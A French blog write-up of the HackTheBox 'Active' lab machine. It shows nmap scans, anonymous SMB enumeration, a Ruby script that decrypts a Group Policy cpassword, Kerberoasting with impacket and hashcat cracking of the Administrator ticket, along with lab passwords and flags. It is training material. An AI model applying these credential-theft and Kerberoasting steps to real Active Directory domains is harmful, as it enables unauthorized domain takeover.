P0pR0cK5's Blog

Pentest, Challenges, Tests and more ...

View on GitHub

HackTheBox - Active

Retour

kvm.png

Nmap

Test de base :

root@kali:~/active# nmap 10.10.10.100 
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-29 21:56 CEST
Nmap scan report for 10.10.10.100
Host is up (0.047s latency).
Not shown: 983 closed ports
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown

Un peut plus précis :

root@kali:~/active# nmap -sV -sC 10.10.10.100
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-29 22:11 CEST 
Nmap scan report for 10.10.10.100
Host is up (0.053s latency).
Not shown: 983 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)   
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)       
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2018-08-29 20:11:10Z)  
135/tcp   open  msrpc         Microsoft Windows RPC    
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn   
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0      
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC   
49153/tcp open  msrpc         Microsoft Windows RPC   
49154/tcp open  msrpc         Microsoft Windows RPC  
49155/tcp open  msrpc         Microsoft Windows RPC       
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0   
49158/tcp open  msrpc         Microsoft Windows RPC 
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -3s, deviation: 0s, median: -3s    
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2018-08-29 22:12:06
|_  start_date: 2018-08-26 23:11:33

Il semble ici que l’on ait du Samba avec pas mal d’autre chose en relation avec un potentiel Active Directory. Lançon SMBmap :

root@kali:~/active# smbmap -H 10.10.10.100 
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.100...
[+] IP: 10.10.10.100:445        Name: 10.10.10.100                                      
        Disk                                                    Permissions
        ----                                                    -----------
        ADMIN$                                                  NO ACCESS
        C$                                                      NO ACCESS
        IPC$                                                    NO ACCESS
        NETLOGON                                                NO ACCESS
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS
        Users                                                   NO ACCESS

Je découvre que le share samba //10.10.10.100/Replication est listable :

root@kali:~/active# smbclient //10.10.10.100/Replication 
WARNING: The "syslog" option is deprecated    
Enter WORKGROUP\root's password:  
Anonymous login successful       
Try "help" to get a list of possible commands.     
smb: \> ls   
  .                                   D        0  Sat Jul 21 12:37:44 2018           
  ..                                  D        0  Sat Jul 21 12:37:44 2018       
  active.htb                          D        0  Sat Jul 21 12:37:44 2018  

Il semble que ce partage ait une arborescence de ce genre :

  • active.htb
    • DfsPrivate
      • ConflictAndDeleted
      • Deleted
      • Installing
    • Policies
      • {31B2F340-016D-11D2-945F-00C04FB984F9}
        • GPT.INI
        • Group Policy
        • MACHINE
          • Microsoft
          • Preferences
            • Groups
              • Groups.xml
          • Registry.pol
        • USER
      • {6AC1786C-016F-11D2-945F-00C04fB984F9}
        • GPT.INI
        • Group Policy
        • MACHINE
        • USER
    • scripts

Bien qu’elle soit plutôt obscure, il s’agit en fait de politique de groupe permettant aux admin du domaine ActiveDirectory de déployer des utilisateur sur ce dernier. Néanmoins le fichier \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml semble intéressant. Ouvrons le :

<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
    <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
        <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>		</User>
</Groups>

Nous découvrons ici un attribut cpassword a la balise Properties. En cherchant le terme sur le web je trouve ceci :

require 'rubygems'
require 'openssl'
require 'base64'
 
encrypted_data = "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
 
def decrypt(encrypted_data)
padding = "=" * (4 - (encrypted_data.length % 4))
epassword = "#{encrypted_data}#{padding}"
decoded = Base64.decode64(epassword)
 
key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x7\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC")
aes.decrypt
aes.key = key
plaintext = aes.update(decoded)
plaintext << aes.final
pass = plaintext.unpack('v*').pack('C*') # UNICODE conversion 
 
return pass
end 
 
blah = decrypt(encrypted_data)
puts blah

Ce qui, une fois lancer, nous retourne :

root@kali:~/active# ruby cpassword.rb 
cpassword.rb:13: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18

Nous avons donc un mot de passe et un utilisateur et son nom de compte ! Passons a l’énumération des partages accessibles par notre utilisateur :

root@kali:~/active# smbmap -H 10.10.10.100 -u "SVC_TGS" -d "active.htb" -p "GPPstillStandingStrong2k18"
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.100...
[+] IP: 10.10.10.100:445        Name: 10.10.10.100                                      
        Disk                                                    Permissions
        ----                                                    -----------
        ADMIN$                                                  NO ACCESS
        C$                                                      NO ACCESS
        IPC$                                                    NO ACCESS
        NETLOGON                                                READ ONLY
        Replication                                             READ ONLY
        SYSVOL                                                  READ ONLY
        Users                                                   READ ONLY

Allons voir dans Users :

root@kali:~/active# smbclient //10.10.10.100/Users -U "SVC_TGS" -W "active.htb"
WARNING: The "syslog" option is deprecated
Enter ACTIVE.HTB\SVC_TGS's password: 
Try "help" to get a list of possible commands.
smb: \> cd SVC_TGS\ Desktop\
smb: \SVC_TGS\Desktop\> ls
  .                                   D        0  Sat Jul 21 17:14:42 2018
  ..                                  D        0  Sat Jul 21 17:14:42 2018
  user.txt                            A       34  Sat Jul 21 17:06:25 2018

                10459647 blocks of size 4096. 4946120 blocks available

Nous avons le flag utilisateur :

root@kali:~/active# cat user.txt 
86d67d8ba232bb6a254aa4d10159e983

Privesc

Pour la partie escalade de privilèges, nous allons exploiter la faille kerberoast. Pour se faire nous utiliserons les outils dispo dans impacket :

git clone https://github.com/CoreSecurity/impacket
python install.py install 
./GetUserSPNs.py -request -dc-ip 10.10.10.100 "active.htb/SVC_TGS:GPPstillStandingStrong2k18" 

Nous obtenons donc :

Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet      LastLogon           
--------------------  -------------  --------------------------------------------------------  -------------------  -------------------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40  2018-07-30 19:17:40 

$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$0ee90e5da85ec66f3628738e2767c549$3d9d849e22cfaeac8879c258a358ae1ffdcbf514a8b4ca9a73b2aef71cfbad9efe54af178c4400a4ca1d5237
0da319df82d42e1c6aef18bd7d457b8378d1da1762195f4adf3b213d977315a0881e683dc3b2a809887079118
5046ec485e19f537f07d90c5934c21dc7aac26fb655ab2ac2de4877facbd64a52865ff8abc3cf7fd634cd1cfb12
85b6957a293dd7b91c165101132ec719a16573e1d34ad3d0c6a0c632519cb152b59bd888f80f3c641b0d08f27328
78ffd09f5af6b649e51c4398e019ffd7a68bc68557aec99241d572cf69bfe8b0c832e19a11efc6fadd337af39d26
5dc8a9388a705e79709f692ee576c628083d7a0f7809071c04f151fa9f95f1140571753a3b91a75a96129ea72b4
09ddf96e064803fab1da0b575f05a659f5b86c52555bd31cfd495a7feb972b8795272296a8c1b0386f30d1ee6bb8
bd05fdcff2a2d33b9221518f4a31b8d8655ff0cba4c633bcf2bc1c9231ffeb6bcfcd44c6cf63ce1ef11e579c1d2b
ebde15b18cb06f8173de04683f3aa8a1016b4534586d1e92a18d6a2ec03389241d223cff3bce0f3d13ca57a35c77
9191a3f99140b86777237b5d80d16a49aba6ff669fa1817ddd6c81808a774ad169edf9647cc73889d35082552189
14b741e6db1348ae21db468fef5e296827910567bd953802b4db47f6f82cea432c759391cae0dbbd152f600695687
513d0156e59d25a975b8954f3c2a230bd6761cb50897d9a6cae838dff633280962dfd12b9668792468b6633de8f5
f75189f8f924f782e712dbd22759c02c2cf2b6d79b5f0eb6d39b1d745e142f225764730dd3021b2a119d8cfcd34d
f18cfb8d3f33dda66e2a8b7b25a6c19d381322743763f96242ac8e6e9c076d87d9058bb5bde55a874f5007af267c
03eb5af5fb75d94a2ab249d5e42c7025069d9a6cf5d33badb9c94aacacee5ae90560705fb6a8bc48436f47bc4c96
6824b10c6fe9a6dffbd069468cb54cf0d4a7432142ec694240398a939768203ee1c5de3958f2b9882f281474406b
4f5e227e4f8cabee25e73d876db8742e5530ad7a586585dbf7f161084e13d1adf03d62be71ff23ab7b4e62b4a6ac
20b98d8a657bc6f8cc3e3ef3439d2a8f6340e014712819bf6a7ae64508d0ba5d72f2029baebe56f80171b8f8b4d13d81fd27549895bd5e7211cea11c44cbac9979a6baf116063c984f4136147d70bb5b5710ac8d030d67fd5d1975c7a89912166e93fa4cfb586a8fdfa4810e69f6724

Il s’agit ici d’une sortie au format Hashcat ou John :


root@kali:~/active# hashcat -m 13100 tocrack /usr/share/wordlists/rockyou.txt -o cracked.txt

Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 TGS-REP etype 23
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4...ccc63d
Time.Started.....: Sun Sep  2 22:14:34 2018 (33 secs)
Time.Estimated...: Sun Sep  2 22:15:07 2018 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:   322.1 kH/s (10.43ms) @ Accel:32 Loops:1 Thr:64 Vec:4
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10543104/14344385 (73.50%)
Rejected.........: 0/10543104 (0.00%)
Restore.Point....: 10534912/14344385 (73.44%)
Candidates.#1....: Tioncurtis23 -> Teague51
HWMon.Dev.#1.....: N/A

root@kali:~/active# cat cracked.txt 
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$1c217979ebf88cf846e21722dc521e70$1d96b4aadb55f5d6474617bf350567da599f8cf6abf2e976faafa53c26eaa65668a6716e2cbd7c74860a066f98ccd4884976dbf2d77667972b959f3d248748da94b271ef28f7f0292288371c90fe9b36989a9b3c3886f69cd0d44f45b1ab0962678e5e88736163ab060df319697c212644550432947a7649a2e4c074fadeb824e86bac491230304899dae8c51d72d5646b9d52df8ac0bf1204d2a2c9d83cea965665aee257e4562940c8e802d793c82e8504f7e29e16a0922f3c3ebec89ef2b06553dfc5c9c5e55cb2ac521827133bd492a787b93fba32ec22764808b454cb549b2019c9d925c9e87dffb10270402a282703bfa687e005c3347ccacff3f4e1f8089421d08b7f018b3e94fc3c2e9f12b744d449751db1d638e779039d7b374423bcfee5c83f1120c81a8889435fa943a72886a6a6da2f847d3e902ca1bee4198a3320b25bf69b0ca056daa2573253306c0e4f2edffc9d6caa814fbce1b3cd99d1bcd04f5a82feeb53bafe0aa90e72c11ecfa35737e3f5c11833a4ab11aefe502a6bdbd2b394c9a20d6afc6e894d2740dc5bfcf31eca5b91b01ff3c9b1c9de4b24b6f95ef71d7b71fd129e2668c98c61bd3039dc4a42d1e4827620a62ef0775fe7a41cfab6038c1ae6bb2c7cba3e69c39320d95034ec1364f8f499f9db30485404e23c138b43d1e0c03d2ad2e62310d9384144ee4aa55586ee3b941d199be3d4919e6b72caa893c884a9e9a7091545db7339534ce1dc5467220dff0d4bc83bc38f917479faccf68c6a3c5efc1add19721d39ee7d35eea8041398537996e676ce28f36d5a51a247f04453746138c317e023ea041fd8608e1e530eecbc1937b52f6520c36c4d0750c18ee89661914ee87a72afc949961e8e2a273352714f973320c6b1f9fb13cee481a2e140e420a72891c8d6d3493b923ac9327edb0c37dd847d55842c6023f56a8e5c00abe743bff96e4faa0d4e9e45eccab107eb7e567ac75c0b166609d93af967616e1ba14eacab1f95c559b2fd46e7dc69065026ad5e6df0e94896161e3de9f6836697b48e820adf5c349cf9137a0efa54d8b782ee5d564be7ccb573ceece05c9ab0f922ca77599a08a3be8e19cb227a8b79edb0057bbd01249cb4e3ed76c2ac80ae47cb4987a65d95bff25c2e9a7580ab5875899df182cac2fcfa428206b47ed5e872365d72ffb08b49dc40cb14f9eb182ca678ea635b50940ab6eec0fee72c1d96b33a84fe4587426d2c69168a7728ccc63d:Ticketmaster1968

Tentons maintenant une connexion :

root@kali:~/active/JohnTheRipper/run# smbclient //10.10.10.100/Users -U "Administrator" -W "active.htb"                                                        
WARNING: The "syslog" option is deprecated                                     
Enter ACTIVE.HTB\Administrator's password:                                     
Try "help" to get a list of possible commands.                                 
smb: \> ls
  .                                  DR        0  Sat Jul 21 16:39:20 2018     
  ..                                 DR        0  Sat Jul 21 16:39:20 2018     
  Administrator                       D        0  Mon Jul 16 12:14:21 2018     
  All Users                         DHS        0  Tue Jul 14 07:06:44 2009     
  Default                           DHR        0  Tue Jul 14 08:38:21 2009     
  Default User                      DHS        0  Tue Jul 14 07:06:44 2009     
  desktop.ini                       AHS      174  Tue Jul 14 06:57:55 2009     
  Public                             DR        0  Tue Jul 14 06:57:55 2009     
  SVC_TGS                             D        0  Sat Jul 21 17:16:32 2018     

                10459647 blocks of size 4096. 4939915 blocks available         
smb: \> cd Administrator\
smb: \Administrator\> cd Desktop\
smb: \Administrator\Desktop\> ls
  .                                  DR        0  Mon Jul 30 15:50:10 2018     
  ..                                 DR        0  Mon Jul 30 15:50:10 2018     
  desktop.ini                       AHS      282  Mon Jul 30 15:50:10 2018     
  root.txt                            A       34  Sat Jul 21 17:06:07 2018     

                10459647 blocks of size 4096. 4939915 blocks available         
smb: \Administrator\Desktop\> get root.txt                                     
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0,2 KiloBytes/sec) (average 0,2 KiloBytes/sec)
smb: \Administrator\Desktop\> exit
root@kali:~/active/JohnTheRipper/run# cat root.txt                             
b5fc76d1d6b91d77b2fbf2d54d0f708b

Liens

Cpassword : déchiffrement

https://pentestlab.blog/tag/cpassword/

Kerberoast

https://room362.com/post/2016/kerberoast-pt1/ https://room362.com/post/2016/kerberoast-pt2/ https://room362.com/post/2016/kerberoast-pt3/

Get hash from kerberos

https://github.com/CoreSecurity/impacket https://github.com/CoreSecurity/impacket/blob/master/examples/GetUserSPNs.py


Written on July 7, 2019 by


Retour